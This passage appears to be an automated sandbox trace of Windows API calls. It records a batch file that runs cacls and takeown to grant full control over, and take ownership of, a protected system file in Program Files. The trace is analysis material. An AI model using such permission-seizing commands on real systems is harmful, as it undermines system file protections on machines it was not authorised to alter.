_wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0281.050] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0281.050] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0281.052] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xa0ef18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa0ef64 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xa0ef64*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xdf4, dwThreadId=0xbf0)) returned 1 [0281.060] CloseHandle (hObject=0xb0) returned 1 [0281.060] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0281.060] GetEnvironmentStringsW () returned 0xde9df8* [0281.060] FreeEnvironmentStringsA (penv="=") returned 1 [0281.060] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0286.318] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xa0eefc | out: lpExitCode=0xa0eefc*=0x0) returned 1 [0286.318] CloseHandle (hObject=0xb8) returned 1 [0286.318] _vsnwprintf (in: _Buffer=0xa0efe4, _BufferCount=0x13, _Format="%08X", _ArgList=0xa0ef04 | out: _Buffer="00000000") returned 8 [0286.318] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0286.318] GetEnvironmentStringsW () returned 0xdee310* [0286.318] FreeEnvironmentStringsA (penv="=") returned 1 [0286.318] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0286.318] GetEnvironmentStringsW () returned 0xdee310* [0286.318] FreeEnvironmentStringsA (penv="=") returned 1 [0286.318] DeleteProcThreadAttributeList (in: lpAttributeList=0xa0ef90 | out: lpAttributeList=0xa0ef90) [0286.318] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.318] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0286.423] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.423] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0286.423] _get_osfhandle (_FileHandle=0) returned 0x38 [0286.423] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0286.424] SetConsoleInputExeNameW () returned 0x1 [0286.424] GetConsoleOutputCP () returned 0x1b5 [0286.424] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0286.424] SetThreadUILanguage (LangId=0x0) returned 0x409 [0286.424] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa0f724, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0286.424] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0286.424] _get_osfhandle (_FileHandle=3) returned 0xb8 [0286.424] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0286.425] _get_osfhandle (_FileHandle=3) returned 0xb8 [0286.425] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0286.425] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa0f6f4, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xa0f6f4*=0xc2, lpOverlapped=0x0) returned 1 [0286.425] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0286.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0286.425] _get_osfhandle (_FileHandle=3) returned 0xb8 [0286.425] GetFileType (hFile=0xb8) returned 0x1 [0286.425] _get_osfhandle (_FileHandle=3) returned 0xb8 [0286.425] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0286.425] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0286.425] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0286.425] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0286.425] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0286.425] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0286.425] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0286.425] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0286.426] _tell (_FileHandle=3) returned 47 [0286.426] _close (_FileHandle=3) returned 0 [0286.426] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f4b8 | out: _Buffer="\r\n") returned 2 [0286.426] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.426] GetFileType (hFile=0x3c) returned 0x2 [0286.426] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.427] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f490 | out: lpMode=0xa0f490) returned 1 [0286.427] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.427] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f4a8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f4a8*=0x2) returned 1 [0286.427] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0286.427] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0286.427] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xa0f4b4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0286.427] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xa0f4b4 | out: _Buffer=">") returned 1 [0286.427] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.427] GetFileType (hFile=0x3c) returned 0x2 [0286.427] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.427] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f494 | out: lpMode=0xa0f494) returned 1 [0286.427] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.427] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xa0f4ac, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xa0f4ac*=0x1e) returned 1 [0286.428] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.428] GetFileType (hFile=0x3c) returned 0x2 [0286.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.428] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f734 | out: lpMode=0xa0f734) returned 1 [0286.428] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.428] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xde78b8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa0f74c, lpReserved=0x0 | out: lpBuffer=0xde78b8*, lpNumberOfCharsWritten=0xa0f74c*=0x7) returned 1 [0286.428] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa0f754 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\" ") returned 62 [0286.428] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.428] GetFileType (hFile=0x3c) returned 0x2 [0286.428] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.428] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f72c | out: lpMode=0xa0f72c) returned 1 [0286.429] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.429] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa0f744, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f744*=0x3e) returned 1 [0286.429] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa0f768 | out: _Buffer="\r\n") returned 2 [0286.429] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.429] GetFileType (hFile=0x3c) returned 0x2 [0286.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.429] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xa0f740 | out: lpMode=0xa0f740) returned 1 [0286.429] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.429] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa0f758, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xa0f758*=0x2) returned 1 [0286.429] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0286.429] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0286.429] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0286.429] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0286.429] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0286.429] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0286.429] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0286.429] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0286.429] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0286.430] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0286.430] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0286.430] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0286.430] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0286.430] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0286.430] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0286.430] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0286.430] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0286.430] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0286.430] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0286.430] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0286.430] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0286.430] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0286.430] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0286.430] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0286.430] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0286.430] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0286.430] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0286.430] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0286.430] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0286.430] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0286.430] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0286.430] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0286.430] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0286.430] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0286.430] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0286.430] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0286.430] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0286.430] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0286.430] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0286.430] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0286.430] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0286.430] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0286.430] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0286.430] SetErrorMode (uMode=0x0) returned 0x0 [0286.430] SetErrorMode (uMode=0x1) returned 0x0 [0286.430] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdef8f8, lpFilePart=0xa0f504 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0f504*="Desktop") returned 0x1d [0286.430] SetErrorMode (uMode=0x0) returned 0x1 [0286.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0286.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0286.431] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0286.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.431] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0286.431] GetLastError () returned 0x2 [0286.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.431] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0286.431] GetLastError () returned 0x2 [0286.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xde0b68 [0286.431] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0286.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xffffffff [0286.432] GetLastError () returned 0x2 [0286.432] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xa0f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0f290) returned 0xde0b68 [0286.432] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0286.432] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0286.432] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0286.432] GetConsoleTitleW (in: lpConsoleTitle=0xa0f2d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0286.432] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0286.432] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0286.432] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0286.432] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0286.432] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0286.432] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0286.432] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0286.432] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0286.432] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0286.432] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0286.432] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0286.432] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0286.432] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0286.432] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0286.432] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0286.432] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0286.432] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0286.432] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0286.432] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0286.432] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0286.432] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0286.433] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0286.433] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0286.433] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0286.433] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0286.433] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0286.433] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0286.433] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0286.433] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0286.433] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0286.433] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0286.433] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0286.433] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0286.433] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0286.433] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0286.433] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0286.433] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0286.433] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0286.433] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0286.433] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0286.433] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0286.433] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0286.433] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0286.433] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0286.433] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0286.433] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0286.433] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0286.433] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0286.433] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0286.433] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0286.433] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0286.433] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0286.433] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0286.434] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0286.434] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0286.434] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0286.434] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0286.434] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0286.434] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0286.434] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0286.434] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0286.434] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0286.434] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0286.434] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0286.434] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0286.434] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0286.434] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0286.434] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0286.434] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0286.434] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0286.434] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0286.434] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0286.434] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0286.434] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0286.434] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0286.434] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0286.434] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0286.434] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0286.434] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0286.434] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0286.434] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0286.434] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0286.434] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0286.434] SetErrorMode (uMode=0x0) returned 0x0 [0286.434] SetErrorMode (uMode=0x1) returned 0x0 [0286.434] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xdecd58, lpFilePart=0xa0ede4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa0ede4*="Desktop") returned 0x1d [0286.434] SetErrorMode (uMode=0x0) returned 0x1 [0286.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0286.434] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0286.435] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0286.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.435] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0286.435] GetLastError () returned 0x2 [0286.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.435] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0286.435] GetLastError () returned 0x2 [0286.435] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xde0b68 [0286.435] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0286.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xffffffff [0286.435] GetLastError () returned 0x2 [0286.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xa0eb70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa0eb70) returned 0xde0b68 [0286.436] FindClose (in: hFindFile=0xde0b68 | out: hFindFile=0xde0b68) returned 1 [0286.436] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0286.436] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0286.436] GetConsoleTitleW (in: lpConsoleTitle=0xa0f064, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0286.436] InitializeProcThreadAttributeList (in: lpAttributeList=0xa0ef90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa0ef74 | out: lpAttributeList=0xa0ef90, lpSize=0xa0ef74) returned 1 [0286.436] UpdateProcThreadAttribute (in: lpAttributeList=0xa0ef90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa0ef7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa0ef90, lpPreviousValue=0x0) returned 1 [0286.436] GetStartupInfoW (in: lpStartupInfo=0xa0efc8 | out: lpStartupInfo=0xa0efc8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0286.436] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0286.437] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0286.437] _wcsnicmp (_String1="COPYCMD", 